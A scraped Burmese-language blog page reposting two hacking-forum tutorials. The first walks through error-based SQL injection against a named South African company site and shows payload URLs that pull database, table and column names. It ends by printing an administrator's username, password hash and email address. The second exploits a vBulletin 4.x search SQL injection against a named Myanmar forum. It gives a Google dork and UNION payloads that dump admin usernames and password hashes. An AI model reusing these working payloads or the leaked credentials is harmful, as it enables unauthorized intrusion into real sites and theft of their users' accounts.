အရင္ဆုံး SQL Injection အေၾကာင္းကုိနဲနဲေလေဖာပါရေစ <span rel="lightbox"><img alt="Posted Image" class="bbc_img" src="http://mmhackforums.com//public/style_emoticons/default/tongue.png" /></span><br />
<br />
SQL Injection ကုိအေျခခံအားျဖင့္ 4မ်ိဳးခဲြျခားလုိ.ရပါတယ္... တခ်ဳိ.ကလည္းသုံးမ်ဳိးလုိ.ေျပာတယ္ ...<br />
<span style="color: brown;">1.Blind Based (Also called Boolean)</span><br />
<span style="color: brown;">2.Union Based (အသုံးမ်ားတယ္)</span><br />
<span style="color: brown;">3.Error Based (အခုေျပာမွာ)</span><br />
<span style="color: brown;">4.Double Query (ေနာက္ေျပာမွာ <span rel="lightbox"><img alt="Posted Image" class="bbc_img" src="http://mmhackforums.com//public/style_emoticons/default/tongue.png" /></span>)</span><br />
<br />
နံပါတ္ ၁ ျဖစ္တဲ့ Blind ကေတာ္ေတာ္ပဲခက္ပါတယ္... Guessing Skill နဲ.
Experience အမ်ားၾကီးလုိပါတယ္ ...လက္ေရွာင္တာမ်ားတယ္(အေနာ္လည္းတစ္ခါမွ
ေအာင္ေအာင္ျမင္္ျမင္မထုိးဘူးေသးဘူး <span rel="lightbox"><img alt="Posted Image" class="bbc_img" src="http://mmhackforums.com//public/style_emoticons/default/tongue.png" /></span>)<br />
Havij Free version မွာလည္းသုံးမရဘူး... Pro version ၀ယ္ႏိုင္ရင္ေကာင္းမယ္ (ကုိေဘာ့စ္ကုိပူဆာ ၾကပါ <span rel="lightbox"><img alt="Posted Image" class="bbc_img" src="http://mmhackforums.com//public/style_emoticons/default/tongue.png" /></span>)<br />
<br />
နံပါတ္ ၂ Union ...ကေတာ့အားလုံးလည္းသိျပီးသား ...နာမည္ၾကီးမင္းသား... တစ္တစ္ခါခါ ... Firewall ခံေနတာကလြဲရင္ အသုံးမ်ားတယ္...<br />
<br />
နံပါတ္ ၃ Error Based ...အရမ္းကုိေကာင္းတဲ့ Method ပါ... Union အလုပ္မလုပ္ေတာ့ရင္ သူကကယ္တင္ရွင္ပဲ...<br />
<br />
နံပါတ္ ၄ Double Q ...သူက Error ရဲ.အဆက္ Query structure
ကနာမည္နဲ.လုိက္ေအာင္ေတာ္ေတာ္ရွည္တယ္... သူ.ကုိသုံးရင္ "Bad
Request"ဆုိျပီးျပတက္တယ္... သိပ္ေတာ့ၾကိဳက္ဘူး.....<br />
<br />
ဒါေတြကအသုံးမ်ားတဲဟာေတြ ... တစ္ျခားအသုံးနည္းတဲ့ MS တုိ. Oracle တုိ. Header Based တုိ.တစ္ပုံၾကီးရွိေသးတယ္...<br />
ကဲကဲေလေဖာတာရပ္ျပီး ....စၾကမယ္ဗ်ာ....<br />
<br />
<span style="color: turquoise;"><span style="font-size: 18px;"><span style="font-family: trebuchet ms,helvetica,sans-serif;">2.About </span></span></span><br />
Error-Based ရဲ. Definition<br />
<br />
<div style="color: red;">
<i>A method of extracting information from a database when UNION SELECT function does not work at all. This can be done using a compiled query to extract the database information </i></div>
<br />
သူ.ကိုဘယ္လုိအေျခအေနေတြမွာသုံးႏိုင္လဲ ....?<br />
သူ.ကုိ Union သုံးေနရင္နဲ. ေအာက္က Error မ်ဳိးတစ္ခုခုေတြ.လာျပီဆုိသုံးႏုိင္ပါတယ္...<br />
<br />
<pre class="prettyprint"><span class="lit">1.</span><span class="pln"> </span><span class="typ">The</span><span class="pln"> </span><span class="typ">Used</span><span class="pln"> </span><span class="typ">Select</span><span class="pln"> </span><span class="typ">Statements</span><span class="pln"> </span><span class="typ">Have</span><span class="pln"> A </span><span class="typ">Different</span><span class="pln"> </span><span class="typ">Number</span><span class="pln"> </span><span class="typ">Of</span><span class="pln"> </span><span class="typ">Columns</span><span class="pun">.</span><span class="pln">
</span><span class="lit">2.</span><span class="pln"> </span><span class="typ">Unknown</span><span class="pln"> column </span><span class="lit">1</span><span class="pln"> </span><span class="kwd">in</span><span class="pln"> order clause</span><span class="pun">.</span><span class="pln"> </span><span class="pun">(</span><span class="kwd">or</span><span class="pln"> </span><span class="lit">0</span><span class="pun">)</span><span class="pln">
</span><span class="lit">3.</span><span class="pln"> </span><span class="typ">Can</span><span class="str">'t find your columns in the page source.
4. Error #1604</span></pre>
<br />
ကုိယ္က Union မသုံးခ်င္ဘူးဆုိလည္းသူ.ကိုတန္းသုံးခ်င္လည္းရတယ္...<br />
Demo အေနနဲ.ဒီ site ကုိသုံးျပပါမယ္...<br />
<pre class="prettyprint" style="color: red;"><span class="pln">http</span><span class="pun">:</span><span class="com">//www.elansystems.co.za/product-item.php?product_items_id=11</span></pre>
<pre class="prettyprint"><span class="com"> </span></pre>
<pre class="prettyprint"><span style="color: turquoise;"><span style="font-size: 18px;"><span style="font-family: verdana,geneva,sans-serif;">3.Version စစ္မယ္</span></span></span>
အရင္ဆုံး Version စစ္ဖုို.သုံးရမယ့္ Query က
<span class="kwd" style="color: red;">or</span><span class="pln" style="color: red;"> </span><span class="lit" style="color: red;">1</span><span class="pln" style="color: red;"> </span><span class="kwd" style="color: red;">group</span><span class="pln" style="color: red;"> </span><span class="kwd" style="color: red;">by</span><span class="pln" style="color: red;"> concat_ws</span><span class="pun" style="color: red;">(</span><span class="lit" style="color: red;">0x3a</span><span class="pun" style="color: red;">,</span><span class="pln" style="color: red;">version</span><span class="pun" style="color: red;">(),</span><span class="pln" style="color: red;">floor</span><span class="pun" style="color: red;">(</span><span class="pln" style="color: red;">rand</span><span class="pun" style="color: red;">(</span><span class="lit" style="color: red;">0</span><span class="pun" style="color: red;">)*</span><span class="lit" style="color: red;">2</span><span class="pun" style="color: red;">))</span><span class="pln" style="color: red;"> having min</span><span class="pun" style="color: red;">(</span><span class="lit" style="color: red;">0</span><span class="pun" style="color: red;">)</span><span class="pln" style="color: red;"> </span><span class="kwd" style="color: red;">or</span><span class="pln" style="color: red;"> </span><span class="lit" style="color: red;">1</span><span class="pun" style="color: red;">--</span>
ဒါဆုိျဖစ္လာမယ့္ Url ပုံစံေလးက ...
<span style="color: red;">http://www.elansyste...uct_items_id=11 or 1 group by concat_ws(0x3a,version(),floor(rand(0)*2)) having min(0) or 1--</span>
ရလာမယ့္ Result ကုိအခုလုိ Duplicate Entry ေလးနဲ.ျမင္ရပါမယ္ ...
</pre>
<div class="citation">
Quote</div>
<div class="blockquote">
<div class="quote">
Duplicate entry '5.1.63-0+squeeze1:1' for key 'group_key'</div>
</div>
<pre class="prettyprint"><span class="com"> </span></pre>
<pre class="prettyprint"><span style="color: turquoise;"><span style="font-size: 18px;"><span style="font-family: georgia,serif;">4.Database စစ္မယ္</span></span></span>
DB Name ကုိသိခ်င္ရင္ သုံးရမယ့္ Query က</pre>
<pre class="prettyprint"><span class="com"> </span></pre>
<pre class="prettyprint"><span class="com"><span style="color: red;">and (select 1 from (select count(*),concat((select(select concat(cast(database() as</span></span></pre>
<pre class="prettyprint"><span class="com"><span style="color: red;"> char),0x7e)) from information_schema.tables where table_schema=database() limit 0,</span></span></pre>
<pre class="prettyprint"><span class="com"><span style="color: red;">1),floor(rand(0)*2))x from information_schema.tables group by x)a) </span></span></pre>
<pre class="prettyprint"><span class="com"> </span></pre>
<pre class="prettyprint">ဒါဆုိျဖစ္လာမယ့္ Url ပုံစံေလးက ...</pre>
<pre class="prettyprint"><span class="com"> </span></pre>
<pre class="prettyprint"><span class="com">http://www.elansystems.co.za/product-item.php?product_items_id=11 [color=#ffd700]and (select 1 from (select count(*),concat((select(select concat(cast(database() as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)[/color]</span></pre>
<pre class="prettyprint"><span class="com"> </span></pre>
<pre class="prettyprint">ရလာမယ့္ Result ကုိအခုလုိ Duplicate Entry ေလးနဲ.ျမင္ရပါမယ္ ...
</pre>
<div class="citation">
Quote</div>
<div class="blockquote">
<div class="quote">
<span style="color: red;">Duplicate entry 'elansyst_elan~1' for key 'group_key'</span></div>
</div>
Notepad ေလးဖြင့္ျပီး အသာေလးတုိ.ထားလုိက္ ....<br />
ကဲဘယ္လုိလဲ လြယ္လြယ္ေလးပဲမဟုတ္လား... <span rel="lightbox"><img alt="Posted Image" class="bbc_img" src="http://mmhackforums.com//public/style_emoticons/default/smile.png" /></span><br />
<br />
<span style="color: turquoise;"><span style="font-size: 18px;"><span style="font-family: times new roman,times,serif;">5.Table name ေတြရွာမယ္</span></span></span><br />
သုံးရမယ့္ Query က...<br />
<div class="citation">
Quote</div>
<div class="blockquote">
<div class="quote">
<span style="color: red;">and
(select 1 from (select count(*),concat((select(select
concat(cast(table_name as char),0x7e)) from information_schema.tables
where table_schema=database() limit 0,1),floor(rand(0)*2))x from
information_schema.tables group by x)a)</span></div>
</div>
သတိ limit Function ကုိသုံထားျပီး Table name ေတြကိုတစ္ခုခ်င္း... 1 တုိးျပီးႏုွိက္ထုတ္ပါမယ္....<br />
limit 0,1 ဆုိတဲ့ေနရာမွာ 1,1 .... 2,1 ....စသျဖင့္ Table name ေတြတစ္ခုခ်င္းၾကည့္ရမွာပါ...<br />
<br />
ဒါဆုိျဖစ္လာမယ့္ Url ပုံစံေလးက ...<br />
<br />
<pre class="prettyprint"><span class="pln">http</span><span class="pun">:</span><span class="com">//www.elansystems.co.za/product-item.php?product_items_id=11 and (select 1 from (select count(*),concat((select(select concat(cast(table_name as char),0x7e)) from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)</span></pre>
ရလာမယ့္ Result ကုိအခုလုိ Duplicate Entry ေလးနဲ.ျမင္ရပါမယ္ ...<br />
<div class="citation">
Quote</div>
<div class="blockquote">
<div class="quote">
Duplicate entry 'dealer_tbl~1' for key 'group_key'</div>
</div>
ဆက္ရွာပါ.. ကုိယ္စိတ္၀င္စားတာေတြ.ရင္ရပ္ေပါ့...<br />
ဒီေနရာမွာ Table 'wp_users' ကစိတ္၀င္စားဖုိ. တစ္အားေကာင္းေနျပီ <span rel="lightbox"><img alt="Posted Image" class="bbc_img" src="http://mmhackforums.com//public/style_emoticons/default/smile.png" /></span><br />
ဒီေတာ့ users ထဲက Columns ေတြကို ႏုွိက္ထုတ္ပါ့မယ္....<br />
<br />
<span style="color: turquoise;"><span style="font-size: 18px;"><span style="font-family: lucida sans unicode,lucida grande,sans-serif;">6. Column name ေတြရွာမယ္</span></span></span><br />
သုံးရမယ့္ Query က...<br />
<div class="citation">
Quote</div>
<div class="blockquote">
<div class="quote">
<span style="color: yellow;">and
(select 1 from (select count(*),concat((select(select
concat(cast(column_name as char),0x7e)) from information_schema.columns
where table_name=0x</span><span style="color: red;">TABLEHEX</span><span style="color: yellow;"> limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)</span></div>
</div>
<br />
ဒီေနရာမွာ ကုိယ္ေျပာင္းရမယ့္ေနရာေတြက ...<br />
1.Limit<br />
2.table_name ကုိHexခံမယ္ (<a class="bbc_url" href="http://www.swingnote.com/tools/texttohex.php" rel="nofollow external" title="External link">http://www.swingnote...s/texttohex.php</a>)<br />
ဒီလုိနဲ. limit ကုိ ၁ စီတုိးျပီး ... Column name ေတြရပါလိမ့္မယ္...<br />
<br />
<br />
ဒါဆုိျဖစ္လာမယ့္ Url ပုံစံေလးက ...<br />
<pre class="prettyprint"><span class="pln">http</span><span class="pun">:</span><span class="com">//www.elansystems.co.za/product-item.php?product_items_id=11 and (select 1 from (select count(*),concat((select(select concat(cast(column_name as char),0x7e)) from information_schema.columns where table_name=0x77705f7573657273 limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)</span></pre>
ရလာမယ့္ Result ကုိအခုလုိ Duplicate Entry ေလးနဲ.ျမင္ရပါမယ္ ...<br />
<div class="citation">
Quote</div>
<div class="blockquote">
<div class="quote">
Duplicate entry 'ID~1' for key 'group_key'</div>
</div>
<br />
<span style="color: darkorange;">cOlumn Name - user_name , user_password , user-email</span> ကိုစိတ္၀င္စားတယ္ဟုတ္?<br />
ok? .....<br />
<br />
<span style="color: turquoise;"><span style="font-size: 18px;"><span style="font-family: lucida sans unicode,lucida grande,sans-serif;">7.Harvesting Data</span></span></span><br />
ကုိယ့္စိတ္၀င္စားမယ့္ Column name ေတြလည္းရျပီဆုိရင္ Extract လုပ္ပါေတာ့မယ္...<br />
သုံရမယ္ Query ပုံစံက<br />
<div class="citation">
Quote</div>
<div class="blockquote">
<div class="quote">
<span style="color: yellow;">and (select 1 from (select count(*),concat((select(select concat(cast(concat(</span><span style="color: red;">COLUMN_NAME</span><span style="color: yellow;">) as char),0x7e)) from </span><span style="color: red;">Databasename.TABLENAME</span><span style="color: yellow;"> limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)</span></div>
</div>
<br />
ကိုယ္ေျပာင္းရမယ့္ေနရာေတြက ...<br />
1.Limit function (count 1 by 1)<br />
2.Databasename (ေစာေစာကတုိ.ထားတဲ့ name ကုိထည့္)<br />
3.TableName (အခုေရာက္ေနတဲ့ table ေပ့ါ)<br />
4.COLUMNNAME (ကို္ယ့္စိတ္၀င္စားတဲ့ COLUMN ေပါ့)<br />
<br />
ဒါဆုိျဖစ္လာမယ့္ Url ပုံစံေလးက ...<br />
<pre class="prettyprint"><span class="pln">http</span><span class="pun">:</span><span class="com">//www.elansystems.co.za/product-item.php?product_items_id=11 and (select 1 from (select count(*),concat((select(select concat(cast(concat(user_login) as char),0x7e)) from elansyst_elan.wp_users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)</span></pre>
ရလာမယ့္ Result ကုိအခုလုိ Duplicate Entry ေလးနဲ.ျမင္ရပါမယ္ ...<br />
<div class="citation">
Quote</div>
<div class="blockquote">
<div class="quote">
Duplicate entry 'elan_admin~1' for key 'group_key'</div>
</div>
<br />
ေနာက္ဆုံးရမယ္အေျဖကုိ ကိုယ့္ပါသာကုိယ္ပဲဆက္ျပီးလုပ္ၾကည့္ပါေတာ့<br />
<div class="citation">
Quote</div>
<div class="blockquote">
<div class="quote">
<span style="color: goldenrod;"> elan_admin,$P$BG5yVgzxllpqcLrfwWR9q2TJ8jo8MR0 , darren@elansystems.co.za</span></div>
</div>
<br />
<span style="color: turquoise;"><span style="font-size: 18px;"><span style="font-family: trebuchet ms,helvetica,sans-serif;">8.Conclusion </span></span></span><br />
ဒီေလာက္ဆုိ လြယ္လြယ္ကူကူပဲသေဘာေပါက္မိလိမ့္မယ္ထင္ပါတယ္... ဒီနည္းကအသုံးလည္း၀င္ျပီးလြယ္လည္းလြယ္ကူပါတယ္...<br />
အားနည္းခ်က္ေတြက<br />
၁.Query ရွည္လုိ.အမွားအယြင္းရွိႏုိင္တယ္...<br />
၂.Union မွာ Firewall နဲ.တုိးျပီးဆုိ WAF bypass လုပ္လုိ.ေကာင္းတယ္.. Error
ဆုိစိတ္ညစ္ဖုိ.ေကာင္း (အေနာ္လည္းအခုထိလုပ္တက္ေသးဘူး
..လုပ္တက္တဲ့သူမ်ားေအာက္မွာတစ္ခါတည္းေျပာျပၾကပါ ... )<br />
၃.နည္းနည္းလက္၀င္တယ္....<br />
<br />
copy from <a href="http://mmhackforums.com//index.php?/topic/669-tuterror-based-sql-injectiontut/" target="_blank">http://mmhackforums.com//index.php?/topic/669-tuterror-based-sql-injectiontut/ </a><br />
<br />
<br />
<br />
<br />
<br />
<pre class="prettyprint"><span class="com"> </span></pre>
shwekoyantawhttp://www.blogger.com/profile/09091277533756466724noreply@blogger.comtag:blogger.com,1999:blog-2967231180093766350.post-27902293453660458592012-08-26T07:05:00.001-07:002012-08-26T07:05:49.804-07:00[TUT]Vbulletin Forum Hacking with Header-Based SQL injection[TUT] <div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyMPmm2iXwdxwn46sh7UjRvZ8yh4oRfFtoMAj0mKxqseghmLMlu90NwbfjphIpA74G6tVtQ8lu1iu649yiw0qqOYcMC-RAq9XYzoCS3HsQMruTQaPfxiBUht4sKN3SAQJNg71Ol9REoOo/s1600/index.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgyMPmm2iXwdxwn46sh7UjRvZ8yh4oRfFtoMAj0mKxqseghmLMlu90NwbfjphIpA74G6tVtQ8lu1iu649yiw0qqOYcMC-RAq9XYzoCS3HsQMruTQaPfxiBUht4sKN3SAQJNg71Ol9REoOo/s1600/index.jpg" /></a></div>
<div class="bbc_center">
<br /></div>
<div class="bbc_center">
<br /></div>
<div class="bbc_center">
<br /></div>
<div class="bbc_center">
<span class="bbc_underline"><b class="bbc"><span style="color: cyan;"><span style="font-size: 36px;"><span style="font-family: trebuchet ms,helvetica,sans-serif;">Injecting Vbulletin Forum </span></span></span></b></span></div>
<div class="bbc_center">
<b class="bbc">******************</b></div>
<div class="bbc_center">
<b class="bbc"><span style="color: darkorange;"><span style="font-size: 24px;"><span style="font-family: tahoma,geneva,sans-serif;">/Content\</span></span></span></b></div>
<div class="bbc_center">
<b class="bbc"><span style="font-size: 12px;"><span style="font-family: arial,helvetica,sans-serif;">****************************</span></span></b></div>
<div class="bbc_center">
<b class="bbc"><span style="color: darkorange;"><span style="font-size: 24px;"><span style="font-family: tahoma,geneva,sans-serif;">$1.Intro</span></span></span></b></div>
<div class="bbc_center">
<b class="bbc"><span style="color: darkorange;"><span style="font-size: 24px;"><span style="font-family: tahoma,geneva,sans-serif;">$2.Tutorial</span></span></span></b></div>
<div class="bbc_center">
<b class="bbc"><span style="color: darkorange;"><span style="font-size: 24px;"><span style="font-family: tahoma,geneva,sans-serif;">$3.Conclusion</span></span></span></b></div>
<br />
<span class="bbc_underline"><span style="color: darkorange;"><span style="font-size: 24px;"><span style="font-family: tahoma,geneva,sans-serif;">$1.Intro</span></span></span></span><br />
<br />
<div class="citation">
Quote</div>
<div class="blockquote">
<div class="quote">
<span style="color: paleturquoise;">Category </span> : Forum Group Injection<br />
<span style="color: paleturquoise;">Method</span> : Header-Based SQL injection<br />
<span style="color: paleturquoise;">Original Exploit</span> :<span style="color: gold;"><a class="bbc_url" href="http://www.exploit-id.com/web-applications/vbulletin-4-0-x-4-1-2-search-php-sql-injection-" rel="nofollow external" title="External link">http://www.exploit-i...-sql-injection-</a> vulnerability<span style="font-family: monospace;"> by </span>D4rkB1t</span><br />
<span style="color: paleturquoise;">Software</span> :Vbulletin<br />
<span style="color: paleturquoise;">Dork</span> :inurl:"search.php?search_type=1"<br />
<span style="color: paleturquoise;">Vulnerable Version</span> : 4.0.x to 4.1.2</div>
</div>
<br />
<br />
(Ques? ကုိနတ္ဆုိးေရ... အခုေျပာမယ့္ အေၾကာင္းအရာေလးကုိ နဲနဲေလာက္ရွင္းျပပါဦး)<br />
(Ans : ဟုတ္ကဲ့ပါ... ရွင္းပါတယ္.. Vbulletin Forum ေတြကုိ SQL injection
ေပါက္တဲ့အေၾကာင္းေလးပါတယ္...
ကန္.သတ္ခ်က္ေလးေတြရွိပါတယ္....အေပၚမွာေရထားတဲ့အတုိင္း.... version က 4.0.x
ကေန 4.1.2 အတြင္းပဲရမွာ vulnerable ျဖစ္ႏွုန္းက ... နဲနဲနည္းပါတယ္... 50%
၀န္းက်င္ေလာက္ေတာ့ရွိပါတယ္... vbulletin ဆုိေတာ့ Admin login
ရွာရတာလြယ္ပါတယ္.... ရလာတဲ့ hash ကုိ ျဖည္ဖုိ.ခက္တာပါ)<br />
<br />
<span style="color: darkorange;">MRTV-4 ကေတြ.ဆုံေမးျမန္းတဲ့ စတုိင္ဖမ္းထားတယ္.</span>... <span rel="lightbox"><img alt="Posted Image" class="bbc_img" src="http://mmhackforums.com//public/style_emoticons/default/biggrin.png" /></span> <span rel="lightbox"><img alt="Posted Image" class="bbc_img" src="http://mmhackforums.com//public/style_emoticons/default/biggrin.png" /></span><br />
<br />
(Ques? ဟင္..ခင္ဗ်ားဟာကလည္း... version ကလည္းေအာက္ေသး....
ျဖစ္ႏုိ္င္ေျခကလည္းနည္းေသး... hashed ကလည္းေျဖမရေတာ့...
ဘာသြားလုပ္ေတာ့မွာတုန္း...)<br />
(Ans: နည္းပညာေလဗ် နည္းပညာ...<br />
နည္းပညာလုိက္စားသူတုိင္းက တစ္ခုခု...အသစ္သိရတုိင္း...ထမင္းေမ့ဟင္းေမ့ေလ့လာတက္ၾကတယ္... ခင္ဗ်ားနည္းပညာကုိမသိခ်င္ဘူးလား..?)<br />
<br />
<br />
<div class="bbc_center">
<span style="color: cyan;">$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$</span></div>
<span class="bbc_underline"><span style="color: darkorange;"><span style="font-size: 24px;"><span style="font-family: tahoma,geneva,sans-serif;">$2.Tutorial</span></span></span></span><br />
ေတာ္ပါျပီ... ေလပန္းေနတာရပ္ျပီး... စပါေတာ့မယ္... ဒန္တန္.တန္..... <span rel="lightbox"><img alt="Posted Image" class="bbc_img" src="http://mmhackforums.com//public/style_emoticons/default/smile.png" /></span><br />
အရင္ဆုံး Live Http headers မရွိသူမ်ား.... အျမန္ဆုံးသြင္းလုိက္ၾကပါ....<br />
<pre class="prettyprint"><span class="kwd">goto</span><span class="pln"> </span><span class="pun">:</span><span class="pln"> broswer </span><span class="pun">>></span><span class="pln"> </span><span class="typ">Alt</span><span class="pun">+</span><span class="pln">T </span><span class="pun">>></span><span class="pln"> A </span><span class="pun">>></span><span class="pln"> </span><span class="typ">Search</span><span class="pln"> </span><span class="kwd">for</span><span class="pln"> addons</span></pre>
<br />
ပုံမွန္ဆုိရင္ ... google မွာ dork ထည့္ရွာျပီး... Forum ၀င္ျပီး...
ေဖာက္ရမွာပါတယ္... အခုေတာ့ ကြ်န္ေတာ့္ demo ေလးနဲ.ပဲ ...လုပ္ပါေတာ့... <span rel="lightbox"><img alt="Posted Image" class="bbc_img" src="http://mmhackforums.com//public/style_emoticons/default/smile.png" /></span><br />
demo site:<br />
<div class="citation">
Quote</div>
<div class="blockquote">
<div class="quote">
www.myanmarengineer.org</div>
</div>
ကုိေဘာ့စိက... အၾကားအျမင္ရေနလားမတိဘူး.... <img alt=":P" class="bbc_emoticon" src="http://mmhackforums.com//public/style_emoticons/default/tongue.png" /><br />
Forum rules ကျမန္မာ website မ်ားမလုပ္ပါနဲ.ဆုိေတာ့... အခုဟာက ... ခဏေလးပဲစမ္းၾကည့္မွာပါ... (Rule လြတ္တယ္ေနာ္ <img alt=":)" class="bbc_emoticon" src="http://mmhackforums.com//public/style_emoticons/default/smile.png" />)<br />
password ရလည္းဘာမွလုပ္လုိ.မရပါဘူး ... (သိတဲ့အတုိင္းပဲ.. Vbulletin hash အေၾကာင္းကုိေလ)<br />
<br />
အဲဒီ့ေတာ့ vul ျဖစ္တဲ့ေနရာ .... Community ထဲက ... Groups ေနရာမွာပါ....<br />
site ရဲ. ညာဘက္ေထာင့္ဆုံး.... အေပၚနားေလးမွာ ... Advanced Search button ေလးကုိ ႏိွပ္ပါ<br />
ေအာက္ကပုံေလးထဲကုိေရာက္သြားလိမ့္မယ္...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmyo6ZaMYJ51F18lMx0ewc0awPidsAF7ylzayC0RO_2MsPinkyt5GsP4ha0xe-76rtC8C6ABEQnM4nQeLtkkxE-BXKTMSA9LdlO1M9_iu_IFkO9Sn42EH9ROIoNQx22wdw4op6RTgYzuU/s1600/FVq2L.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmyo6ZaMYJ51F18lMx0ewc0awPidsAF7ylzayC0RO_2MsPinkyt5GsP4ha0xe-76rtC8C6ABEQnM4nQeLtkkxE-BXKTMSA9LdlO1M9_iu_IFkO9Sn42EH9ROIoNQx22wdw4op6RTgYzuU/s1600/FVq2L.png" /></a></div>
<br />
လုပ္ရမယ့္အဆင့္ဆင့္က ... forum မွာ member ၀င္... အုပ္စုထဲကုိသြား...ကုိယ့္ဘာသာ ...အုပ္စုတစ္ခုခုကုိ create လုပ္ ...<br />
ဒါမွမဟုတ္လဲ ... ရွိျပီးသား...တစ္ခုခုကုိ ခဏမွတ္ထားလုိက္ေပါ့...<br />
<br />
ဒီအဆင့္ေတြျပီးသြားရင္ ... ေစာေစာက Advanced Search ကုိျပန္သြားပါ ...<br />
ကုိယ္မွတ္ထားတဲ့ Group နာမည္ကုိ search box ထဲထည့္ပါ....<br />
<br />
ေစာေစာ Install လုပ္ထားတဲ့ ... Live Http headers add-on ကိုဖြင့္ထားပါ ...<br />
ျပီးရင္ search now ကုိႏိွပ္ပါ...<br />
ေအာက္ကပုံကုိၾကည့္ၾကပါ...<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2WjP_w31pnncDQ9BlGtzYOhnTShsI3m1Il2hQFodSLLtywb7TxhEcscE1Zgd3PjXjfHj53-SEAeow-1PX1-FRlXaUSAojAWI6rUaJKArZG3DApTKOewYTROyLM6PMo2XfgaNmIX9y_fU/s1600/q4Wac.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2WjP_w31pnncDQ9BlGtzYOhnTShsI3m1Il2hQFodSLLtywb7TxhEcscE1Zgd3PjXjfHj53-SEAeow-1PX1-FRlXaUSAojAWI6rUaJKArZG3DApTKOewYTROyLM6PMo2XfgaNmIX9y_fU/s1600/q4Wac.png" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
ပုံမွာ highlight လုပ္ထားတဲ့ ... စာသားေလးကုိေတြ.ေအာင္ရွာပါ ...<br />
ျပီးရင္... click လုပ္... ေအာက္က replay button ကုိႏိွပ္....<br />
<a class="bbc_url" href="http://i.imgur.com/lBdsZ.png" rel="nofollow external" title="External link">http://i.imgur.com/lBdsZ.png</a><br />
အခုလုိ ျမင္ရပါလိမ့္မယ္..<br />
<span rel="lightbox"></span><br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1avz6NW-hbdc1-sR6fPO62bJuVl85qk4xZe5gOzzA0CUHX9NiSpNc4SUIaaiXoA5Bwhk3DEgEXv-dZWTP-ONTrDSI20r-8f9bQMAmFAWbxfdEi5qmVehyphenhyphenDAtUZL-KNukieIOJifYlrkc/s1600/Tmb4N.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1avz6NW-hbdc1-sR6fPO62bJuVl85qk4xZe5gOzzA0CUHX9NiSpNc4SUIaaiXoA5Bwhk3DEgEXv-dZWTP-ONTrDSI20r-8f9bQMAmFAWbxfdEi5qmVehyphenhyphenDAtUZL-KNukieIOJifYlrkc/s1600/Tmb4N.png" /></a></div>
<br />
<br />
<br />
cotent box ထဲက.... စာေတြထဲမွာ ေနာက္ဆုံးက .. Id= ဆုိတာကုိေတြ.တယ္ဟုတ္... အဲဒီ့ မွာ SQL query ေတြပုိ.မွာ...<br />
ေအာက္ကဟာေလးကုိ cp/paste လုပ္ျပီး.... replay button ကုိႏွိပ္ပါ...<br />
<br />
<pre class="prettyprint"><span class="pun">&</span><span class="pln">cat</span><span class="pun">[</span><span class="lit">0</span><span class="pun">]=</span><span class="lit">1</span><span class="pun">)</span><span class="pln"> </span><span class="kwd">union</span><span class="pln"> </span><span class="kwd">select</span><span class="pln"> version</span><span class="com">#</span></pre>
<br />
ဒါဆုိအခုလုိ vesion ျမင္ရမယ္....<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcaDKRfmFDtrUIAEXmtptyuqQ-O2Lzfe_8J25xGfIqgW8EfV0_2oH18WJb0hhOWU_jfLiyrYl87Ik7l8juYP0mxF5mkn-mtr3g7TPDd_uzg5oABaR_Tm5E7-jrImIPy5E7h9Ba_Vu-a6M/s1600/WcN2g.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcaDKRfmFDtrUIAEXmtptyuqQ-O2Lzfe_8J25xGfIqgW8EfV0_2oH18WJb0hhOWU_jfLiyrYl87Ik7l8juYP0mxF5mkn-mtr3g7TPDd_uzg5oABaR_Tm5E7-jrImIPy5E7h9Ba_Vu-a6M/s1600/WcN2g.png" /></a></div>
<br />
<br />
ေနာက္ဆုံးအဆင့္ ... usr name ေတြ password ေတြ လုိခ်င္ရင္ေအာက္က query ကုိေစာေစာကအတုိင္းပုိ.လုိက္ေပါ့....<br />
<br />
<pre class="prettyprint"><span class="pun">&</span><span class="pln">cat</span><span class="pun">[</span><span class="lit">0</span><span class="pun">]=</span><span class="lit">1</span><span class="pln"> </span><span class="kwd">union</span><span class="pun">+</span><span class="kwd">select</span><span class="pun">+</span><span class="pln">group_concat</span><span class="pun">(</span><span class="pln">userid</span><span class="pun">,</span><span class="lit">0x3a</span><span class="pun">,</span><span class="pln">username</span><span class="pun">,</span><span class="lit">0x3a</span><span class="pun">,</span><span class="pln">password</span><span class="pun">,</span><span class="lit">0x3a</span><span class="pun">,</span><span class="pln">usergroupid</span><span class="pun">)</span><span class="pln"> </span><span class="kwd">from</span><span class="pln"> user </span><span class="kwd">where</span><span class="pln"> usergroupid</span><span class="pun">=</span><span class="lit">6</span><span class="com">#</span></pre>
